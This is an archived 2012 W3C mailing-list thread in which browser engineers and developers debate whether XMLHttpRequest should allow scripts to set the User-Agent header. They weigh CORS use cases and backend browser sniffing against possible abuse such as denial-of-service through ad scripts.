approach. Now I'm just trying to see if there is no potential danger here.


 aside

  The burden of proof is on you. *You* ha


 Emphasis with asterisks seems unnecessary aggressive. Perhaps
 unintentionally so. :)
 /aside


Sorry about that, not my intention at all. I'd love to be convinced and I'd
just love it if Hallvord (or anyone really) could actually pull it off. So
it's positive excitement, not negative one. I hope my answer above will
make my reasonning a bit clearer (just realized it wasn't quite clear
before).


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Julian Aubourg
 Are you really saying that backend developers want to use User-Agent to
limit the
 number of requests accepted from Firefox?  (Not one user's Firefox, but
all Firefox
 users, at least of a particular version, combined.)  That doesn't make
sense at all.
 If that's not what you mean, then please clarify, because I don't know
any other way
 the User-Agent header could be used to limit requests.

A more likely scenario is a URL that only accepts a specific user agent
that is not a browser (backend). If user script can change the UserAgent,
it can request this URL repeatedly. Given it's in the browser, a shared
resource (like an ad provider or a CDN) becomes a very tempting point of
failure.

AFAIK, you don't have the same problem with PHP libs for instance (you
don't request same from a third-party server, making it a potential vector
of attack).

I'm not saying it's smart (both from the hacker's POW or the backend POW)
but I'm just being careful and trying to see if there is potential for
abuse.

On 11 October 2012 16:22, Glenn Maynard gl...@zewt.org wrote:

 On Thu, Oct 11, 2012 at 8:09 AM, Julian Aubourg j...@ubourg.net wrote:

  I still don't fully understand the scenario(s) you have in mind.

 You're confusing the script's origin with the site's origin. XHR requests
 from within a script are issued with the origin of the page that the script
 is included into.

 Now, read back your example but suppose the attack is to be pulled
 against cnn.com. At a given time (say cnn.com's peek usage time), the
 script issues a gazillions requests. Bye-bye server.


 I'm confused.  What does this have to do with unblacklisting the
 User-Agent header?

 That's why I took the ad example. Hack a single point of failure (the ad
 server, a CDN) and you can DOS a site using the resource from network
 points all over the net. While the frontend dev is free to use scripts
 hosted on third-parties, the backend dev is free to add a (silly but
 effective) means to limit the number of requests accepted from a browser.
 Simple problem, simple solution and the spec makes it possible.


 Are you really saying that backend developers want to use User-Agent to
 limit the number of requests accepted from Firefox?  (Not one user's
 Firefox, but all Firefox users, at least of a particular version,
 combined.)  That doesn't make sense at all.  If that's not what you mean,
 then please clarify, because I don't know any other way the User-Agent
 header could be used to limit requests.

 --
 Glenn Maynard





Re: Fwd: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Boris Zbarsky

On 10/11/12 9:09 AM, Julian Aubourg wrote:

Did you ask backend devs why they white-listed browsers?


Yes.  Typically they don't have a good answer past we felt like it, in 
my experience.  Particularly for the ones that will send you different 
content based on somewhat random parts of your UA string (like whether 
you're using an Irish Gaelic localized browser or not).



Did you try and educate them?


Yes.  With little success.


Did you ever encounter any sensible use-case for this?


For serving different content based on UA string?  Sure, though there 
are pretty few such uses cases.


The question is whether it should be possible to spoof the UA to get the 
other set of content.  For example, if I _am_ using an Irish Gaelic 
localized Firefox, should I still be able to get the content the site 
would send to every single other Firefox localization?  Seems like that 
might be desirable, especially because the site wasn't actually _trying_ 
to lock out Gaelic speakers; it just happens to not be very good at 
parsing UA strings.



You have to be very careful with breaking backward compatibility.


It's not clear to me how the ability to set the UA string breaks 
backwards compatibility, offhand.


-Boris



[XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Hallvord R. M. Steen

Should XHR allow scripts to set User-Agent?

Cons:
* The spec suggests the limitation helps ensure some data integrity
* Slight back-compat risks if we encounter scripts that attempt to set  
User-Agent on sites with backends that expect nomal browser UA strings.  
This may sound far-fetched but some sites do fingerprint the browser by  
the value of various headers and use this fingerprint as a security  
measure.


Pros:
* We should try to avoid imposing limitations on scripts, except when  
careful reasoning suggests we need those limitations
* User-Agent is not a very useful header in the first place, backends  
should not rely on it
* Allowing it can help scripts work around broken backends that DO abuse  
User-Agent - particularly useful with CORS, where one might want to get  
data from a site that allows cross-origin usage but has backend browser  
sniffing/blocking
* Conceptually, a JavaScript making HTTP requests can also claim to be  
acting on behalf of the user, being the user's Agent.


Personally I'm strongly in favour of removing User-Agent from the list of  
prohibited headers. As an author I've experienced problems I could not  
solve due to this limitation.


--
Hallvord R. M. Steen
Core tester, Opera Software



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Hallvord R. M. Steen

Julian Aubourg j...@ubourg.net skreiv Tue, 09 Oct 2012 15:32:42 +0200


I agree the use cases do not seem compelling. But I know I'm generally
surprised by what people can and will do. What problem did you encounter
that would have necessitated to change the User-Agent string, Hallvord?


I've had trouble writing extensions and user scripts to work around  
backend sniffing, due to being unable to simply set User-Agent for a  
specific script-initiated request and get the correct content. As I've  
attempted to explain to Anne, I think this experience is relevant to  
scripts using CORS, because they also want to interact with backends the  
script author(s) don't choose or control.


Interacting, in a sane way, with a backend that does browser sniffing is a  
*very* compelling use case to me.



Just think what a
malicious script could do to browser usage statistics


The changed User-Agent will of course only be sent with the requests  
initiated by the script, all other requests sent from the browser will be  
normal. Hence, the information loss will IMO be minimal and probably have  
no real-world impact on browser stats.



Also, there actually
are security concerns. While I trust open-source browsers (and mainstream
close-source ones) not to try and trick servers into malicious  
operations,

I can't say the same for the whole web, especially malicious ad scripts.


If your backend really relies on User-Agent header values to avoid being  
tricked into malicious operations you should take your site offline for  
a while and fix that ;-). Any malicious Perl/PHP/Ruby/Shell script a  
hacker or script kiddie might try to use against your site can already  
fake User-Agent.


A malicious ad script would presumably currently have the user's web  
browser's User-Agent sent with any requests it would make to your site, so  
unless you want to guard yourself from users running  
HackedMaliciousEvilWebBrowser 1.0 I don't see what protection you would  
loose from allowing XHR-set User-Agent.


--
Hallvord R. M. Steen
Core tester, Opera Software



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Jarred Nicholls
On Tue, Oct 9, 2012 at 9:29 AM, Hallvord R. M. Steen hallv...@opera.comwrote:

 Anne van Kesteren ann...@annevk.nl skreiv Tue, 09 Oct 2012 15:13:00
 +0200


  it was once stated that allowing full control would be a security risk.


 I don't think this argument has really been substantiated for the
 User-Agent header. I don't really see what security problems setting
 User-Agent can cause.

 (To be honest, I think the list of disallowed headers in the current spec
 was something we copied from Macromedia's policy for Flash without much
 debate for each item).


  (If you mean this would help you from browser.js or similar such
 scripts I would lobby for making exceptions there, rather than for the
 whole web.)


 Well, browser.js and user scripts *is* one use case but I fully agree that
 those are special cases that should not guide spec development.

 However, if you consider the CORS angle you'll see that scripts out there
 are already being written to interact with another site's backend, and such
 scripts may face the same challenges as a user script or extension using
 XHR including backend sniffing. That's why experience from user.js
 development is now relevant for general web tech, and why I'm making this
 argument.


 --
 Hallvord R. M. Steen
 Core tester, Opera Software


I agree with Hallvord, I cannot think of any additional *real* security
risk involved with setting the User-Agent header.  Particularly in a CORS
situation, the server-side will (should) already be authenticating the
origin and request headers accordingly.  If there truly is a compelling
case for a server to only serve to Browser XYZ that is within scope of the
open web platform, I'd really like to hear that.

Jarred


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Hallvord R. M. Steen

Julian Aubourg j...@ubourg.net skreiv Tue, 09 Oct 2012 16:34:08 +0200


I've had trouble writing extensions and user scripts to work around

backend sniffing, due to being unable to simply set User-Agent for a
specific script-initiated request and get the correct content. As I've
attempted to explain to Anne, I think this experience is relevant to
scripts using CORS, because they also want to interact with backends the
script author(s) don't choose or control.


 If the backend sniffs out (all or some) browsers, it's the backend's
choice.


We end up in a philosophical disagreement here :-) I'd say that whatever  
browser the user decides to use is the user's choice and the server should  
respect that.



CORS has been specified so that you NEED a cooperative backend.
Unlock a header and some other means to sniff you out will be found and
used :/


Anne van Kesteren also makes a similar point, so I'll respond to both:


If you consider CORS you also need to consider that if we allow
developers to set user-agent a preflight request would be required for
that header (and the server would need to allow it to be custom). So
it's not quite that simple and would not actually help.


One word: legacy. For example Amazon.com might want to enable CORS for  
some of its content. The team that will do that won't necessarily have any  
intention of blocking browsers, but will very likely be unaware of the  
widespread browser sniffing in other parts of the Amazon backend. (With  
sites of Amazon's or eBay's scale, there is in my experience simply no  
single person who is aware of all browser detection and policies). Hence,  
there is IMO non-negligible risk that a large web service will be  
cooperative on CORS but still shoot itself in the foot with browser  
sniffing.


If I write, say, a CORS content aggregator, I would want it to run in all  
browsers, not only those allowed by the content providers. And I'd want to  
be in control of that. Hence, in my view this issue is mostly a trade-off  
between something script authors may need and more theoretical purity  
concerns.



The changed User-Agent will of course only be sent with the requests
initiated by the script, all other requests sent from the browser will  
be normal. Hence, the information loss will IMO be minimal and probably  
have no real-world impact on browser stats.



var XHR = window.XMLHttpRequest;

window.XMLHttpRequest = function() {
   var xhr = new XHR(),
   send = xhr.send;
   xhr.send = function() {
   xhr.setRequestHeader( User-Agent, OHHAI! );
   return send.apply( this, arguments );
   };
   return xhr;
};


Yes, this could give a generic library like jQuery less control of the  
contents of *its* request. However, there will still be plenty of requests  
not sent through XHR - the browser's main GET or POST for the actual page  
contents, all external files loaded with SCRIPT, LINK, IMG, IFRAME, EMBED  
or OBJECT, all images from CSS styling etc. Hence I still believe the  
information loss and effect on stats will be minimal.


Also, the above could be a feature if I'm working on extending a site  
where I don't actually fully control the backend - think a CMS I'm forced  
to use and have to work around bugs in even if that means messing with how  
jQuery sends its requests ;-).


If your backend really relies on User-Agent header values to avoid  
being
tricked into malicious operations you should take your site offline  
for a
while and fix that ;-). Any malicious Perl/PHP/Ruby/Shell script a  
hacker

or script kiddie might try to use against your site can already fake
User-Agent



Oh, I agree entirely. Except checking User-Agent is a quick and painless
means to protect against malicious JavaScript scripts. I don't like the
approach more than you do, but we both know it's used in the wild.


I'm afraid I don't know how this is used in the wild and don't fully  
understand your concerns. Unless you mean we should protect dodgy SEO  
tactics sending full site contents to Google bot UAs but a paywall block  
to anyone else from user-applied scripts trying to work around that?



A malicious ad script would presumably currently have the user's web
browser's User-Agent sent with any requests it would make



The malicious script can trick the server into accepting a request the
backend expects to be able to filter out by checking a header which the
standard says is set by the browser and cannot be changed by user  
scripts.

Think painless DOS with a simple piece of javascript.


I still don't fully understand the scenario(s) you have in mind.

For a DOS attack you'd be launching it against some third-party site (it  
doesn't make sense for a site to DOS itself, right?). Trying to understand  
this, here are my assumptions:


* The threat scenario is trying to DOS victim.example.com by getting a  
malicious javascript targetting this site to run on cnn.com or some  
similar high-volume site. (The attacker presumably